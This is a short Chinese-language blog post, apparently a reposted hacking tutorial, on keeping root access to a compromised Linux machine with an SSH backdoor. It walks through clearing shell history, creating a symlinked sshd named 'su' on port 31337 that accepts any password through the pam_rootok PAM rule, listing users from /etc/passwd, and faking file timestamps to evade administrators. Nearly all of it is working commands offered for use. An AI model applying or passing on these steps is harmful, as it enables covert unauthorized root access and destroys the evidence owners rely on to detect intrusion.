SSH 维持权限(好用)

很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门

 

1.目的

长期维持机器root权限,同时后门有需要躲避管理检测
通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等

SSH命令痕迹清除,登陆之后先执行

unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace

每次输入命令前加上空格即可不再history中记录命令

2.后门方式
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
3.使用使用任意密码登录系统后门
ssh root:test@192.168.116.100 -p 31338
4.查看存在哪些用户
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|more
1 # 如下
2 root|0|0
3 sync|4|65534
4 mysql|104|109
5 postgres|113|117
6 arpwatch|117|120
7 Debian-snmp|118|123
8 speech-dispatcher|127|29
9 Debian-gdm|130|138
5.修改上传文件时间戳

touch -r 老文件时间戳 新文件时间戳

6.退出ssh
exit
 注

0.任意密码登陆的核心是auth sufficient pam_rootok.so,只要PAM配置文件中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM配置文件除了su还有chsh、chfn
1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用
2.被控主机不允许root登录,可用其他已存在用户登录

上一篇:在linux环境版本为centos7中改root的密码复杂度


下一篇:10年前文章_fedora10root登录